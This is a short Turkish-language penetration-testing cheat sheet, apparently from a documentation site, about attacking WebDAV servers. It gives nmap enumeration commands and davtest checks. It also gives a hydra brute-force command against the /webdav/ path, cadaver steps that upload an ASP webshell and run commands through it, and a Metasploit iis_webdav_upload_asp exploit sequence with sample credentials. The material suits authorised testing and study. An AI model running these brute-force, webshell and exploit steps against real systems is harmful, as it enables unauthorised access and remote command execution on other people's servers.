Belirtilen yolda kullanılabilecek metodları listeler.
Copy nmap --script http-methods --script-args http-methods.url-path=/webdav/ <IP>
Webdav dizini varsa bilgilerini listeler.
Copy nmap --script http-webdav-scan --script-args http-methods.url-path=/webdav/ <IP>
Eğer dizinlerin arasında webdav var ise aşağıdaki komut ile giriş yapmayı deneyebiliriz.
Copy davtest -url http://example.com/webdav
Brute Force
Giriş yapmak için brute-force saldırısı yapabiliriz.
Copy hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/common_passwords.txt <IP> http-get /webdav/
Giriş bilgilerini bulduktan sonra aşağıdaki komut ile giriş yapabiliriz.
Copy davtest -auth admin:password123 -url http://example.com/webdav
Komut Çalıştırma
Webdav dizinine dosya yüklemek için cadaver aracını kullanıyoruz.
Copy cadaver http://example.com/webdav
put /usr/share/webshells/asp/webshell.asp
Bir webshell yükledikten sonra istediğimiz komutu çalıştırabiliriz.
Copy https://example.com/webdav/webshell.asp?cmd=whoami
Aynı işlemi msfconsole ile de yapabiliriz.
Copy msfconsole -q
use exploit/windows/iis/iis_webdav_upload_asp
set RHOSTS https://example.com
set HttpUsername admin
set HttpPassword password123
set PATH /webdav/metasploit%RAND%.asp
exploit
Last updated 7 months ago